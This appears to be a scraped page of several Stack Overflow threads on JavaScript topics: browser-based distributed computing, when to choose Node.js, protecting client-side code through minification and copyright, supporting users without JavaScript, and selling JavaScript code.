Javascript Distributed Computing [closed] - javascript

Closed. This question is opinion-based. It is not currently accepting answers.
Want to improve this question? Update the question so it can be answered with facts and citations by editing this post.
Closed 4 years ago.
Improve this question
Why aren't there any Javascript distributed computing frameworks / projects? The idea seems absolutely awesome to me because:
The Client is the Browser
Iteration can be done with AJAX
Webmasters could help projects by linking the respective Javascript
Millions or even billions of users would help DC projects without even noticing
Please share your views on this subject.
EDIT: Also, what kind of problems do you think would be suitable for JSDC?
GIMPS for instance would be impossible to implement.

I think that Web Workers will soon be used to create distributed computing frameworks, there are some early attempts at this concept. Non-blocking code execution could have been done before using setTimeout, but it made a little sense as most browser vendors focused on optimizing their JS engines just recently. Now we have faster code execution and new features, so running some tasks unconsciously in background as we browse the web is probably just a matter of months ;)

There is something to be said for 'user rights' here. It sounds like you're describing a situation where the webmaster for Foo.com includes the script for, say, Folding#Home on their site. As a result, all visitors to Foo.com have some fraction of their CPU "donated" to Folding#Home, until they navigate away from Foo.com. Without some sort of disclaimer or opt-in, I would consider that a form of malware and avoid vising any site that did that.
That's not to say you couldn't build a system that asked for confirmation or permission, but there is definite potential for abuse.

I have pondered this myself in the context of item recommendation.
First, there is no problem with speed! JIT compiled javascript can be as fast as unoptimized C, especially for numeric code.
The bigger problem is that running javascript in the background will slow down the browser and therefore users may not like your website because it runs slowly.
There is obviously an issue of security, how can you verify the results?
And privacy, can you ensure sensitive data isn't compromised?
On top of this, it's quite a difficult thing to do. Can the number of visits you receive justify the effort that you'll have to put into it? It would be better if you could run the code transparently on either the server or client-side. Compiling other languages to javascript can help here.
In summary, the reason that it's not widespread is because developers' time is more valuable than server time. The risk of losing user data and the inconvenience to users outweighs the potential gains.

First that comes to my mind is security.
Almost all distributed protocols that I know have encryption, thats why they prevent security risks. Although this subject is not so innovative..
http://www.igvita.com/2009/03/03/collaborative-map-reduce-in-the-browser/
Also Wuala is a distributed system, that is implemented using java applet.

I know of pluraprocessing.com doing similar thing, not sure if exactly javascript, but they run Java through browser and runs totally in-memory with strict security.
They have 50,000 computers grid on which they have successfully run applications even like web-crawling (80legs).

I think we can verify results on some kind of problem.
Let's say we have n number of items and need to sort it. We'll give it to worker-1, worker-1 will give us the result. We can verify it O(n) time. Please consider that it take at least O(n*log(n)) time to produce the result. Additionally we should consider how large is n items? (concern about network speed)
Another example, f(x)=12345, and function is given. Purpose is to find value of x. We can test it by replace x with some worker's result. I think some problems that are not verifiable are difficult to give to someone.

The whole idea of Javascript Distributed Computing has number of disadvantages:
single point of failure - there is no direct way to comunicate between nodes
natural fails of nodes - every node is working as long as browser
no guarantee that message sent will be ever received - according to natural fails of nodes
no guarantee that message received have been ever sent - because some hacker can interpose
annoying load on client side
ethical problems
while there is only one (but very tempting) advantage:
easy and free access to milions of nodes - almost every device has JS supporting browser nowadays
However the biggest problem is corelation between scalability and annoyance. Let's say you offer some attractive web service and run computing on client side. More people you use for computing, more people are annoyed. More people are annoyed, less people use your service. Well, you can limit annoyance (computing), scalability or try something between.
Consider google for example. If google will run computations on client side, some people will start to use bing. How many ? Depends on annoyance level.
The only hope for Javascript Distributed Computing may be multimedial services. As long as they consume lots of CPU, nobody will notice any additional load.

I think the no.1 problem is javascript inefficiency at computing. It wouldn't be just worth it, because an application in pure c/c++ would be 100 times faster.

I found a question similar to this a while back, so I built a thingy that does this. It uses web workers and fetches scripts dynamically (but no Eval!). Web workers sandbox the scripts so they cannot access the window or the DOM. You can see the code here, and the main website here
The library has a consent popup on first load, so the user knows what's going on in the background.

Related

Confused about nodes purpose [duplicate]

Locked. This question and its answers are locked because the question is off-topic but has historical significance. It is not currently accepting new answers or interactions.
I am new to this kind of stuff, but lately I've been hearing a lot about how good Node.js is. Considering how much I love working with jQuery and JavaScript in general, I can't help but wonder how to decide when to use Node.js. The web application I have in mind is something like Bitly - takes some content, archives it.
From all the homework I have been doing in the last few days, I obtained the following information. Node.js
is a command-line tool that can be run as a regular web server and lets one run JavaScript programs
utilizes the great V8 JavaScript engine
is very good when you need to do several things at the same time
is event-based so all the wonderful Ajax-like stuff can be done on the server side
lets us share code between the browser and the backend
lets us talk with MySQL
Some of the sources that I have come across are:
Diving into Node.js – Introduction and Installation
Understanding NodeJS
Node by Example (Archive.is)
Let’s Make a Web App: NodePad
Considering that Node.js can be run almost out-of-the-box on Amazon's EC2 instances, I am trying to understand what type of problems require Node.js as opposed to any of the mighty kings out there like PHP, Python and Ruby. I understand that it really depends on the expertise one has on a language, but my question falls more into the general category of: When to use a particular framework and what type of problems is it particularly suited for?
You did a great job of summarizing what's awesome about Node.js. My feeling is that Node.js is especially suited for applications where you'd like to maintain a persistent connection from the browser back to the server. Using a technique known as "long-polling", you can write an application that sends updates to the user in real time. Doing long polling on many of the web's giants, like Ruby on Rails or Django, would create immense load on the server, because each active client eats up one server process. This situation amounts to a tarpit attack. When you use something like Node.js, the server has no need of maintaining separate threads for each open connection.
This means you can create a browser-based chat application in Node.js that takes almost no system resources to serve a great many clients. Any time you want to do this sort of long-polling, Node.js is a great option.
It's worth mentioning that Ruby and Python both have tools to do this sort of thing (eventmachine and twisted, respectively), but that Node.js does it exceptionally well, and from the ground up. JavaScript is exceptionally well situated to a callback-based concurrency model, and it excels here. Also, being able to serialize and deserialize with JSON native to both the client and the server is pretty nifty.
I look forward to reading other answers here, this is a fantastic question.
It's worth pointing out that Node.js is also great for situations in which you'll be reusing a lot of code across the client/server gap. The Meteor framework makes this really easy, and a lot of folks are suggesting this might be the future of web development. I can say from experience that it's a whole lot of fun to write code in Meteor, and a big part of this is spending less time thinking about how you're going to restructure your data, so the code that runs in the browser can easily manipulate it and pass it back.
Here's an article on Pyramid and long-polling, which turns out to be very easy to set up with a little help from gevent: TicTacToe and Long Polling with Pyramid.
I believe Node.js is best suited for real-time applications: online games, collaboration tools, chat rooms, or anything where what one user (or robot? or sensor?) does with the application needs to be seen by other users immediately, without a page refresh.
I should also mention that Socket.IO in combination with Node.js will reduce your real-time latency even further than what is possible with long polling. Socket.IO will fall back to long polling as a worst case scenario, and instead use web sockets or even Flash if they are available.
But I should also mention that just about any situation where the code might block due to threads can be better addressed with Node.js. Or any situation where you need the application to be event-driven.
Also, Ryan Dahl said in a talk that I once attended that the Node.js benchmarks closely rival Nginx for regular old HTTP requests. So if we build with Node.js, we can serve our normal resources quite effectively, and when we need the event-driven stuff, it's ready to handle it.
Plus it's all JavaScript all the time. Lingua Franca on the whole stack.
Reasons to use NodeJS:
It runs Javascript, so you can use the same language on server and client, and even share some code between them (e.g. for form validation, or to render views at either end.)
The single-threaded event-driven system is fast even when handling lots of requests at once, and also simple, compared to traditional multi-threaded Java or ROR frameworks.
The ever-growing pool of packages accessible through NPM, including client and server-side libraries/modules, as well as command-line tools for web development. Most of these are conveniently hosted on github, where sometimes you can report an issue and find it fixed within hours! It's nice to have everything under one roof, with standardized issue reporting and easy forking.
It has become the defacto standard environment in which to run Javascript-related tools and other web-related tools, including task runners, minifiers, beautifiers, linters, preprocessors, bundlers and analytics processors.
It seems quite suitable for prototyping, agile development and rapid product iteration.
Reasons not to use NodeJS:
It runs Javascript, which has no compile-time type checking. For large, complex safety-critical systems, or projects including collaboration between different organizations, a language which encourages contractual interfaces and provides static type checking may save you some debugging time (and explosions) in the long run. (Although the JVM is stuck with null, so please use Haskell for your nuclear reactors.)
Added to that, many of the packages in NPM are a little raw, and still under rapid development. Some libraries for older frameworks have undergone a decade of testing and bugfixing, and are very stable by now. Npmjs.org has no mechanism to rate packages, which has lead to a proliferation of packages doing more or less the same thing, out of which a large percentage are no longer maintained.
Nested callback hell. (Of course there are 20 different solutions to this...)
The ever-growing pool of packages can make one NodeJS project appear radically different from the next. There is a large diversity in implementations due to the huge number of options available (e.g. Express/Sails.js/Meteor/Derby). This can sometimes make it harder for a new developer to jump in on a Node project. Contrast that with a Rails developer joining an existing project: he should be able to get familiar with the app pretty quickly, because all Rails apps are encouraged to use a similar structure.
Dealing with files can be a bit of a pain. Things that are trivial in other languages, like reading a line from a text file, are weird enough to do with Node.js that there's a StackOverflow question on that with 80+ upvotes. There's no simple way to read one record at a time from a CSV file. Etc.
I love NodeJS, it is fast and wild and fun, but I am concerned it has little interest in provable-correctness. Let's hope we can eventually merge the best of both worlds. I am eager to see what will replace Node in the future... :)
To make it short:
Node.js is well suited for applications that have a lot of concurrent connections and each request only needs very few CPU cycles, because the event loop (with all the other clients) is blocked during execution of a function.
A good article about the event loop in Node.js is Mixu's tech blog: Understanding the node.js event loop.
I have one real-world example where I have used Node.js. The company where I work got one client who wanted to have a simple static HTML website. This website is for selling one item using PayPal and the client also wanted to have a counter which shows the amount of sold items. Client expected to have huge amount of visitors to this website. I decided to make the counter using Node.js and the Express.js framework.
The Node.js application was simple. Get the sold items amount from a Redis database, increase the counter when item is sold and serve the counter value to users via the API.
Some reasons why I chose to use Node.js in this case
It is very lightweight and fast. There has been over 200000 visits on this website in three weeks and minimal server resources has been able to handle it all.
The counter is really easy to make to be real time.
Node.js was easy to configure.
There are lots of modules available for free. For example, I found a Node.js module for PayPal.
In this case, Node.js was an awesome choice.
The most important reasons to start your next project using Node ...
All the coolest dudes are into it ... so it must be fun.
You can hangout at the cooler and have lots of Node adventures to brag about.
You're a penny pincher when it comes to cloud hosting costs.
Been there done that with Rails
You hate IIS deployments
Your old IT job is getting rather dull and you wish you were in a shiny new Start Up.
What to expect ...
You'll feel safe and secure with Express without all the server bloatware you never needed.
Runs like a rocket and scales well.
You dream it. You installed it. The node package repo npmjs.org is the largest ecosystem of open source libraries in the world.
Your brain will get time warped in the land of nested callbacks ...
... until you learn to keep your Promises.
Sequelize and Passport are your new API friends.
Debugging mostly async code will get umm ... interesting .
Time for all Noders to master Typescript.
Who uses it?
PayPal, Netflix, Walmart, LinkedIn, Groupon, Uber, GoDaddy, Dow Jones
Here's why they switched to Node.
There is nothing like Silver Bullet. Everything comes with some cost associated with it. It is like if you eat oily food, you will compromise your health and healthy food does not come with spices like oily food. It is individual choice whether they want health or spices as in their food.
Same way Node.js consider to be used in specific scenario. If your app does not fit into that scenario you should not consider it for your app development. I am just putting my thought on the same:
When to use Node.JS
If your server side code requires very few cpu cycles. In other world you are doing non blocking operation and does not have heavy algorithm/Job which consumes lots of CPU cycles.
If you are from Javascript back ground and comfortable in writing Single Threaded code just like client side JS.
When NOT to use Node.JS
Your server request is dependent on heavy CPU consuming algorithm/Job.
Scalability Consideration with Node.JS
Node.JS itself does not utilize all core of underlying system and it is single threaded by default, you have to write logic by your own to utilize multi core processor and make it multi threaded.
Node.JS Alternatives
There are other option to use in place of Node.JS however Vert.x seems to be pretty promising and has lots of additional features like polygot and better scalability considerations.
Another great thing that I think no one has mentioned about Node.js is the amazing community, the package management system (npm) and the amount of modules that exist that you can include by simply including them in your package.json file.
My piece: nodejs is great for making real time systems like analytics, chat-apps, apis, ad servers, etc.
Hell, I made my first chat app using nodejs and socket.io under 2 hours and that too during exam
week!
Edit
Its been several years since I have started using nodejs and I have used it in making many different things including static file servers, simple analytics, chat apps and much more.
This is my take on when to use nodejs
When to use
When making system which put emphasis on concurrency and speed.
Sockets only servers like chat apps, irc apps, etc.
Social networks which put emphasis on realtime resources like geolocation, video stream, audio stream, etc.
Handling small chunks of data really fast like an analytics webapp.
As exposing a REST only api.
When not to use
Its a very versatile webserver so you can use it wherever you want but probably not these places.
Simple blogs and static sites.
Just as a static file server.
Keep in mind that I am just nitpicking. For static file servers, apache is better mainly because it is widely available. The nodejs community has grown larger and more mature over the years and it is safe to say nodejs can be used just about everywhere if you have your own choice of hosting.
It can be used where
Applications that are highly event driven & are heavily I/O bound
Applications handling a large number of connections to other systems
Real-time applications (Node.js was designed from the ground up for real time and to be easy
to use.)
Applications that juggle scads of information streaming to and from other sources
High traffic, Scalable applications
Mobile apps that have to talk to platform API & database, without having to do a lot of data
analytics
Build out networked applications
Applications that need to talk to the back end very often
On Mobile front, prime-time companies have relied on Node.js for their mobile solutions. Check out why?
LinkedIn is a prominent user. Their entire mobile stack is built on Node.js. They went from running 15 servers with 15 instances on each physical machine, to just 4 instances – that can handle double the traffic!
eBay launched ql.io, a web query language for HTTP APIs, which uses Node.js as the runtime stack. They were able to tune a regular developer-quality Ubuntu workstation to handle more than 120,000 active connections per node.js process, with each connection consuming about 2kB memory!
Walmart re-engineered its mobile app to use Node.js and pushed its JavaScript processing to the server.
Read more at: http://www.pixelatingbits.com/a-closer-look-at-mobile-app-development-with-node-js/
Node best for concurrent request handling -
So, Let’s start with a story. From last 2 years I am working on JavaScript and developing web front end and I am enjoying it. Back end guys provide’s us some API’s written in Java,python (we don’t care) and we simply write a AJAX call, get our data and guess what ! we are done. But in real it is not that easy, If data we are getting is not correct or there is some server error then we stuck and we have to contact our back end guys over the mail or chat(sometimes on whatsApp too :).) This is not cool. What if we wrote our API’s in JavaScript and call those API’s from our front end ? Yes that’s pretty cool because if we face any problem in API we can look into it. Guess what ! you can do this now , How ? – Node is there for you.
Ok agreed that you can write your API in JavaScript but what if I am ok with above problem. Do you have any other reason to use node for rest API ?
so here is the magic begins. Yes I do have other reasons to use node for our API’s.
Let’s go back to our traditional rest API system which is based on either blocking operation or threading. Suppose two concurrent request occurs( r1 and r2) , each of them require database operation. So In traditional system what will happens :
1. Waiting Way : Our server starts serving r1 request and waits for query response. after completion of r1 , server starts to serve r2 and does it in same way. So waiting is not a good idea because we don’t have that much time.
2. Threading Way : Our server will creates two threads for both requests r1 and r2 and serve their purpose after querying database so cool its fast.But it is memory consuming because you can see we started two threads also problem increases when both request is querying same data then you have to deal with deadlock kind of issues . So its better than waiting way but still issues are there.
Now here is , how node will do it:
3. Nodeway : When same concurrent request comes in node then it will register an event with its callback and move ahead it will not wait for query response for a particular request.So when r1 request comes then node’s event loop (yes there is an event loop in node which serves this purpose.) register an event with its callback function and move ahead for serving r2 request and similarly register its event with its callback. Whenever any query finishes it triggers its corresponding event and execute its callback to completion without being interrupted.
So no waiting, no threading , no memory consumption – yes this is nodeway for serving rest API.
My one more reason to choose Node.js for a new project is:
Be able to do pure cloud based development
I have used Cloud9 IDE for a while and now I can't imagine without it, it covers all the development lifecycles. All you need is a browser and you can code anytime anywhere on any devices. You don't need to check in code in one Computer(like at home), then checkout in another computer(like at work place).
Of course, there maybe cloud based IDE for other languages or platforms (Cloud 9 IDE is adding supports for other languages as well), but using Cloud 9 to do Node.js developement is really a great experience for me.
One more thing node provides is the ability to create multiple v8 instanes of node using node's child process( childProcess.fork() each requiring 10mb memory as per docs) on the fly, thus not affecting the main process running the server. So offloading a background job that requires huge server load becomes a child's play and we can easily kill them as and when needed.
I've been using node a lot and in most of the apps we build, require server connections at the same time thus a heavy network traffic. Frameworks like Express.js and the new Koajs (which removed callback hell) have made working on node even more easier.
Donning asbestos longjohns...
Yesterday my title with Packt Publications, Reactive Programming with JavaScript. It isn't really a Node.js-centric title; early chapters are intended to cover theory, and later code-heavy chapters cover practice. Because I didn't really think it would be appropriate to fail to give readers a webserver, Node.js seemed by far the obvious choice. The case was closed before it was even opened.
I could have given a very rosy view of my experience with Node.js. Instead I was honest about good points and bad points I encountered.
Let me include a few quotes that are relevant here:
Warning: Node.js and its ecosystem are hot--hot enough to burn you badly!
When I was a teacher’s assistant in math, one of the non-obvious suggestions I was told was not to tell a student that something was “easy.” The reason was somewhat obvious in retrospect: if you tell people something is easy, someone who doesn’t see a solution may end up feeling (even more) stupid, because not only do they not get how to solve the problem, but the problem they are too stupid to understand is an easy one!
There are gotchas that don’t just annoy people coming from Python / Django, which immediately reloads the source if you change anything. With Node.js, the default behavior is that if you make one change, the old version continues to be active until the end of time or until you manually stop and restart the server. This inappropriate behavior doesn’t just annoy Pythonistas; it also irritates native Node.js users who provide various workarounds. The StackOverflow question “Auto-reload of files in Node.js” has, at the time of this writing, over 200 upvotes and 19 answers; an edit directs the user to a nanny script, node-supervisor, with homepage at http://tinyurl.com/reactjs-node-supervisor. This problem affords new users with great opportunity to feel stupid because they thought they had fixed the problem, but the old, buggy behavior is completely unchanged. And it is easy to forget to bounce the server; I have done so multiple times. And the message I would like to give is, “No, you’re not stupid because this behavior of Node.js bit your back; it’s just that the designers of Node.js saw no reason to provide appropriate behavior here. Do try to cope with it, perhaps taking a little help from node-supervisor or another solution, but please don’t walk away feeling that you’re stupid. You’re not the one with the problem; the problem is in Node.js’s default behavior.”
This section, after some debate, was left in, precisely because I don't want to give an impression of “It’s easy.” I cut my hands repeatedly while getting things to work, and I don’t want to smooth over difficulties and set you up to believe that getting Node.js and its ecosystem to function well is a straightforward matter and if it’s not straightforward for you too, you don’t know what you’re doing. If you don’t run into obnoxious difficulties using Node.js, that’s wonderful. If you do, I would hope that you don’t walk away feeling, “I’m stupid—there must be something wrong with me.” You’re not stupid if you experience nasty surprises dealing with Node.js. It’s not you! It’s Node.js and its ecosystem!
The Appendix, which I did not really want after the rising crescendo in the last chapters and the conclusion, talks about what I was able to find in the ecosystem, and provided a workaround for moronic literalism:
Another database that seemed like a perfect fit, and may yet be redeemable, is a server-side implementation of the HTML5 key-value store. This approach has the cardinal advantage of an API that most good front-end developers understand well enough. For that matter, it’s also an API that most not-so-good front-end developers understand well enough. But with the node-localstorage package, while dictionary-syntax access is not offered (you want to use localStorage.setItem(key, value) or localStorage.getItem(key), not localStorage[key]), the full localStorage semantics are implemented, including a default 5MB quota—WHY? Do server-side JavaScript developers need to be protected from themselves?
For client-side database capabilities, a 5MB quota per website is really a generous and useful amount of breathing room to let developers work with it. You could set a much lower quota and still offer developers an immeasurable improvement over limping along with cookie management. A 5MB limit doesn’t lend itself very quickly to Big Data client-side processing, but there is a really quite generous allowance that resourceful developers can use to do a lot. But on the other hand, 5MB is not a particularly large portion of most disks purchased any time recently, meaning that if you and a website disagree about what is reasonable use of disk space, or some site is simply hoggish, it does not really cost you much and you are in no danger of a swamped hard drive unless your hard drive was already too full. Maybe we would be better off if the balance were a little less or a little more, but overall it’s a decent solution to address the intrinsic tension for a client-side context.
However, it might gently be pointed out that when you are the one writing code for your server, you don’t need any additional protection from making your database more than a tolerable 5MB in size. Most developers will neither need nor want tools acting as a nanny and protecting them from storing more than 5MB of server-side data. And the 5MB quota that is a golden balancing act on the client-side is rather a bit silly on a Node.js server. (And, for a database for multiple users such as is covered in this Appendix, it might be pointed out, slightly painfully, that that’s not 5MB per user account unless you create a separate database on disk for each user account; that’s 5MB shared between all user accounts together. That could get painful if you go viral!) The documentation states that the quota is customizable, but an email a week ago to the developer asking how to change the quota is unanswered, as was the StackOverflow question asking the same. The only answer I have been able to find is in the Github CoffeeScript source, where it is listed as an optional second integer argument to a constructor. So that’s easy enough, and you could specify a quota equal to a disk or partition size. But besides porting a feature that does not make sense, the tool’s author has failed completely to follow a very standard convention of interpreting 0 as meaning “unlimited” for a variable or function where an integer is to specify a maximum limit for some resource use. The best thing to do with this misfeature is probably to specify that the quota is Infinity:
if (typeof localStorage === 'undefined' || localStorage === null)
{
var LocalStorage = require('node-localstorage').LocalStorage;
localStorage = new LocalStorage(__dirname + '/localStorage',
Infinity);
}
Swapping two comments in order:
People needlessly shot themselves in the foot constantly using JavaScript as a whole, and part of JavaScript being made respectable language was a Douglas Crockford saying in essence, “JavaScript as a language has some really good parts and some really bad parts. Here are the good parts. Just forget that anything else is there.” Perhaps the hot Node.js ecosystem will grow its own “Douglas Crockford,” who will say, “The Node.js ecosystem is a coding Wild West, but there are some real gems to be found. Here’s a roadmap. Here are the areas to avoid at almost any cost. Here are the areas with some of the richest paydirt to be found in ANY language or environment.”
Perhaps someone else can take those words as a challenge, and follow Crockford’s lead and write up “the good parts” and / or “the better parts” for Node.js and its ecosystem. I’d buy a copy!
And given the degree of enthusiasm and sheer work-hours on all projects, it may be warranted in a year, or two, or three, to sharply temper any remarks about an immature ecosystem made at the time of this writing. It really may make sense in five years to say, “The 2015 Node.js ecosystem had several minefields. The 2020 Node.js ecosystem has multiple paradises.”
If your application mainly tethers web apis, or other io channels, give or take a user interface, node.js may be a fair pick for you, especially if you want to squeeze out the most scalability, or, if your main language in life is javascript (or javascript transpilers of sorts). If you build microservices, node.js is also okay. Node.js is also suitable for any project that is small or simple.
Its main selling point is it allows front-enders take responsibility for back-end stuff rather than the typical divide. Another justifiable selling point is if your workforce is javascript oriented to begin with.
Beyond a certain point however, you cannot scale your code without terrible hacks for forcing modularity, readability and flow control. Some people like those hacks though, especially coming from an event-driven javascript background, they seem familiar or forgivable.
In particular, when your application needs to perform synchronous flows, you start bleeding over half-baked solutions that slow you down considerably in terms of your development process. If you have computation intensive parts in your application, tread with caution picking (only) node.js. Maybe http://koajs.com/ or other novelties alleviate those originally thorny aspects, compared to when I originally used node.js or wrote this.
I can share few points where&why to use node js.
For realtime applications like chat,collaborative editing better we go with nodejs as it is event base where fire event and data to clients from server.
Simple and easy to understand as it is javascript base where most of people have idea.
Most of current web applications going towards angular js&backbone, with node it is easy to interact with client side code as both will use json data.
Lot of plugins available.
Drawbacks:-
Node will support most of databases but best is mongodb which won't support complex joins and others.
Compilation Errors...developer should handle each and every exceptions other wise if any error accord application will stop working where again we need to go and start it manually or using any automation tool.
Conclusion:-
Nodejs best to use for simple and real time applications..if you have very big business logic and complex functionality better should not use nodejs.
If you want to build an application along with chat and any collaborative functionality.. node can be used in specific parts and remain should go with your convenience technology.
Node is great for quick prototypes but I'd never use it again for anything complex.
I spent 20 years developing a relationship with a compiler and I sure miss it.
Node is especially painful for maintaining code that you haven't visited for awhile. Type info and compile time error detection are GOOD THINGS. Why throw all that out? For what? And dang, when something does go south the stack traces quite often completely useless.

How does Gmail , Twitter, Grooveshark, and those web app built with pure javascript UI prevent people from stealing their code? [closed]

Closed. This question is off-topic. It is not currently accepting answers.
Want to improve this question? Update the question so it's on-topic for Stack Overflow.
Closed 10 years ago.
Improve this question
I am currently considering to build a single page web app using restful api and put the entire UI logic in javascript on the client side. This design concept has been adopted by twitter and several other web apps.
However, I am wondering how to prevent user from stealing my javascript code, since my app logic is all stored in javascript. Does product like gmail, grooveshark, or twitter not care about this issue? do they not care if people can just replicate their app by copy the javascript? if so, does it not bring a lot of risk to the business?
I hope someone can answer my question as I am figuring out how other people are building their app. and if anyone has similar concern on this issue.
On a pure technical level you can't. Any Javascript code readable by a browser can be read by a developer UserAgent. In fact there are browser addons which allow the user to read the Javascript behind or linked by any web page.
Having said that, you can make hijacking of your Javascript code harder by using Minification. (eg: http://code.google.com/p/minify/)
As previously stated, there are no way to prevent "code stealing". Just remember we are in a world where code isn't valued anymore. It's so easy to build an application that what really matters is the branding around it.
Anyone can build a facebook of it's own, but the real value is the number of users on facebook. I don't believe that company tries to protect their code anymore, they in fact make it easy for you to get it via github or the likes. Talking about their products and the way there are made are more beneficial to them than you think.
Just take a look at twitter bootstrap. The investment they put in that code is well rewarded by all the people building apps on their technology. It reinforce the technical value of their systems.
You can minify/obfuscate your javascript code, making it essentially unreadably.
For example: http://code.google.com/p/minify/
or check this question:
How can I obfuscate (protect) JavaScript?
If your business requirements state that your source must remain a closely guarded secret and you are attempting to make a single webpage that contains all your business logic you have a conflicting design.
No matter how much obfuscation or minification you perform on your client-side code, there is going to be a way (simple browser plugins to firebug can do this) to deobfuscate your code.
There is no such thing as "security through obscurity".
Take a look at:
http://a0.twimg.com/b/1/bundle/phoenix-core-en-201112200936.js
http://a2.twimg.com/b/1/bundle/phoenix-more-en-201112200936.js
And consider how hard it is to extract useful information from the code.
This is some of the javascript code that your browser downloads when you visit a page on Twitter. This code has been minified (to make it more efficient to move around the network) and obfuscated (to make it harder to read). These techniques make it much harder for the casual user to re-use or reverse-engineer your code. Tools for doing this a widespread and include: Google's Closure Compiler, Yahoo's YUI Compressor, and others.
No such tool is perfect, however. They won't stop a determined hacker -- of course, a determined hacker could probably just reproduce the functionality, which leads to your best defense, IMHO -- which is your copyright.
When you create software, that software is protected by copyright law, in much the same way as other works are (see Software Copyright). If you create a hot new javascript app, and someone rips the code and puts it in their app, you have grounds for legal action. However, the law doesn't just prevent them from using it exactly "as is". From Wikipedia:
There is a certain amount of work that goes into making copyright
successful and just as with other works, copyright for computer
programs prohibits not only literal copying, but also copying of
"nonliteral elements", such as program structure and design.
This can be very valuable protection.

Should your website work without JavaScript [duplicate]

This question already has answers here:
Do web sites really need to cater for browsers that don't have Javascript enabled? [closed]
(20 answers)
Closed 9 years ago.
We're developing a web application that is going to be used by external clients on the internet. The browsers we're required to support are IE7+ and FF3+. One of our requirements is that we use AJAX wherever possible. Given this requirement I feel that we shouldn't have to cater for users without javascript enabled, however others in the team disagree.
My question is, if, in this day and age, we should be required to cater for users that don't have javascript enabled?
Coming back more than 10 years later, it's worth noting my first two bullet points have faded to insignificance, and the situation has improved marginally for the third (accessible browsers do better) and fourth (Google runs more js) as well.
There are a lot more users on the public internet who may have trouble with javascript than you might think:
Mobile browsers (smartphones) often have very poor or buggy javascript implementations. These will often show up in statistics on the side of those that do support javascript, even though they in effect don't. This is getting better, but there are still lots of people stuck with old or slow android phones with very old versions of Chrome or bad webkit clones.
Things like NoScript are becoming more popular, so you should at least have a nice initial page for those users.
If your customer is in any way part of the U.S. Goverment, you are legally required to support screen readers, which typically don't do javascript, or don't do it well.
Search engines will, at best, only run a limited set of your javascript. You want to work well enough without javascript to allow them to still index your site.
Of course, you need to know your audience. You might be doing work for a corporate intranet where you know that everyone has javascript (though even here I'd argue there's a growing trend where these sites are made available to teleworkers with unknown/unrestricted browsers). Or you might be building an app for the blind community where no one has it. In the case of the public internet, you can typically figure about 95% of your users will support it in some fashion (source cited by someone else in one of the links below). That number sounds pretty high, but it can be misleading; turn it around, and if you don't support javascript you're turning away 1 visitor in 20.
See these:
https://stackoverflow.com/questions/121108/how-many-people-disable-javascript
https://stackoverflow.com/questions/822872/do-web-sites-really-need-to-cater-for-browsers-that-dont-have-javascript-enabled>
You should weigh the options and ask yourself:
1) what percentage of users will have javascript turned off. (according to this site, only 5% of the world has it turned off or not available.)
2) will those users be willing to turn it on
3) of those that aren't willing to turn it on, or switch to another browser or device that has javascript enabled, is the lost revenue more than the effort to build a separate non-javascript version?
Instinctively, I say most times the answer is no, don't waste the time building two sites.
My question is, if, in this day and age, we should be required to cater for users that don't have javascript enabled?
Yes, definitely, if the AJAX functionality is core to the working of your site. If you don't, you are effectively denying users who don't have Javascript enabled access to your website, and although this is a rather small proportion (<5% I believe), it means that they won't be able to use your site at all, because the core functions are not available to them.
Of course if you're doing more trivial things with AJAX that just enhance the user experience but are not actually central to the core functionality of the site, then this probably isn't necessary.
Depends really.
I personally switch off JavaScript all the time because I don't trust lots of sites.
However, since you users have explicitly asked for your application, you can assume they will trust it and there is no point in doing extra work.
More, if you have that strong AJAX-affinity requirement, the question seems odd enough.
This is a bit like beating a dead horse, but I'll have a go at it, sure.
I think there could be two basic approaches to this:
1.
Using ajax (and, basically,
javascript) to enhance the experience
of the users, while making sure, that
all of the application's features
work without javascript.
When I am
following this principle, I develop the
interface in two phases - first
without considering javascript at all
(say, using a framework, that doesn't
know about javascript) and then
augment certain workflows by adding
ajax-y validation (don't like pure js
validation, sorry) and so on.
This means, if the user has javascript disabled, your app shall in no way break or become unusable for him.
2.
Using javascript to its fullest, "no javascript - no go" style. If javascript is not available, the user will not be able to use your application at all. It is important to note, that, in my opinion, there is no middle ground, - if you are trying to be in both worlds at once, you are doing too much extra work. Removing the constraints of supporting no-javascript users, obviously adds more opportunities to create a richer user experience. And it makes creating that experience much easier.
I think that depends on the type of web application you are going to build. For example in an e-commerce application the checkout process should propably work without java script because there are some people who deactivate js for checking out (in our experience). In a web 2.0 application in my opinion it isn't necessary to support non-js browser experience.
Developing for both also complicates the development process and is more cost intensive. you have double your web test efforts (testing with and without js) and also think different in the planning phase.
I think it depends on the market segment you're aiming for, if you're going for a tech crowd -such as Stackoverflow.com, or perhaps slashdot- then you're probably fine in expecting users to have JS installed and active.
Other sites, with a medially tech-aware audience, may suffer from users knowing enough about JS-based exploits to have deactivated JS, but with not enough knowledge to enable Scriptblock (or other browser-equivalent).
The non-tech aware audience are probably with the tech-crowd, since they possibly just don't know how to disable JS -or why they may want to- regardless of the risk.
In short, you should cater to spiders without JavaScript enabled, but only to the degree necessary to index the data that you want to expose to the public. Your browser requirements of IE7+ and FF3+ exclude far more people than the total number of people who disable JavaScript. And of those who do disable it, the vast majority know how to enable it when necessary.
I asked myself the same question the other day and came up with the answer that in order to use my application one must have Javascript enabled. I also checked various Ajax powered sites. Even Stackoverflow.
But considering this fact I also believe that you do need to support some degree of prehistoric applications. The main idea is to not let application break when users don't have enabled Javascript. Application should still display relevant data, but its functionality would be limited.
To add to some of the old discussion on this page. Google is now searching JavaScript: http://www.i-programmer.info/news/81-web-general/4248-google-now-searches-javascript.html
This is an issue that I was thinking about just a few days ago. Here is some information
In Google Chrome there is no way (menu/option) inside the browser to turn off Javascript.
Many websites including those from leading names like Google, etc., will not work without Javascript.
According to stats over 95% of visitors have Javascript enabled now.
These stats made me think. Do I have to break my back writing a lot of background code and everything for users who have disabled Javascript?
My conclusion was this. Yes, I have to include Javascript support, but not at the cost of sanity. I.e. I can afford to give it a low priority.
So I am going to have support for non-javascript browsing, but I will build most of it after my site is deployed.

Selling Javascript Code [closed]

Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about programming within the scope defined in the help center.
Closed 8 years ago.
Improve this question
I am planning to sell a javascript code that I have written. Given the current state of browsers its quite possible to write complex code. I think I will face a couple of problems/have a couple of questions:
Javascript being client-side can be easily copied as soon as I show someone a demo
Are there any companies selling javascript code? Not dual licensed like ExtJS.
Should I obfuscate my code? Should I hard-code the website on which it will run and pack it etc.?
How do I go about this?
Thank you for your time.
